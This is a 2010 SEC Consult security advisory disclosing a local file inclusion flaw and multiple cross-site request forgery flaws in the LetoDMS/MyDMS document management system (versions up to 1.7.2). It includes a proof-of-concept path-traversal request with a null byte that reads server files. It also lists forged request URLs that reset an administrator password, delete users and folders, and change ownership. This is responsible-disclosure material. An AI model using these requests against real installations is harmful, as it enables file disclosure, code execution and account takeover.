Local file inclusion/execution and multiple Cross-Site-Request-Forgery vulnerabilities in LetoDMS

SEC Consult Security Advisory < 20100115-0 >

========================================================================

title: Local file inclusion/execution and multiple

Cross-Site-Request-Forgery vulnerabilities in

LetoDMS (formerly MyDMS)

products: LetoDMS (formerly MyDMS)

vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2

fixed version: n.a.

impact: critical

homepage: sourceforge.net/projects/mydms/

found: 2009-10-09

by: D. Fabian / SEC Consult / www.sec-consult.com

L. Weichselbaum / SEC Consult / www.sec-consult.com

========================================================================

 

Vendor description:

-------------------

MyDMS is an open-source, web-based document management system (DMS)

written in PHP with a database backend. Originally coded by Markus

Westphal, MyDMS provides document meta-data, version control, security

and easy access to your documents.

 

source: sourceforge.net/projects/mydms/

 

 

Vulnerability overview/description:

-----------------------------------

The lang-parameter of /mydms/op/op.Login.php is vulnerable to file

inclusion. Through this vulnerability it is possible to read sensitive

data of the web server and to execute malicious PHP-code.

 

Furthermore there exist multiple Cross-Site-Request-Forgery

vulnerabilities which can be used to force a user/admin to execute

unwanted actions. Some of these actions are:

* Create new user with admin-privileges

* Change user credentials

* Delete a user/folder/document

* Change owner of a document

* Change access to a document

* Add keywords

* Add notifications

* Move folders

 

 

Proof of concept:

-----------------

File inclusion/execution

========================

If the guest-account is activated or you have a user to log in, it is

possible to include or execute files. The lang-parameter can be

modified in a malicious way. To terminate the predefined file-ending a

null-byte has to be appended after the file to be included. The

following GET-request can be used to e.g. receive the content of the

boot.ini-file on a server running Windows as operating system. This

vulnerability can also be used to execute malicious PHP-code (e.g.

PHP-code that has been written into log-files).

 

 

PoC request

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../
boot.ini%00&sesstheme= HTTP/1.1
[...]

 

 

Cross-Site-Request-Forgery (CSRF)

=================================

The following requests can be used for CSRF-attacks:

 

- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned
  &fullname=Administrator&email=address@server.com&comment=&userfile= 
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3
  &groupid=-1&mode=4
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3
  &groupid=-1
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1

 

It is assumed that there is more functionality vulnerable to

CSRF-attacks

 

 

Vulnerable versions:

--------------------

MyDMS

* <= 1.7.2

 

Vendor contact timeline:

------------------------

2009-10-29: Contacting developers on SourceForge.Net and on

trilexnet.com by contact-form and the dev-forum.

2009-12-11: No response from developers so far.

2009-12-11: New attempt to contact developers.

2010-01-15: No response from developers.

2010-01-15: Release of the advisory.

 

 

Solution:

---------

n.a.

 

Advisory URL:

-------------

www.sec-consult.com/vulnerability-lab/

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

 

Office Vienna

Mooslackengasse 17

A-1190 Vienna

Austria

 

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com

www.sec-consult.com

 

SEC Consult conducts periodical information security workshops on ISO

27001/BS 7799 in cooperation with BSI Management Systems. For more

information, please refer to www.sec-consult.com/academy_e.html

 

EOF L. Weichselbaum / @2010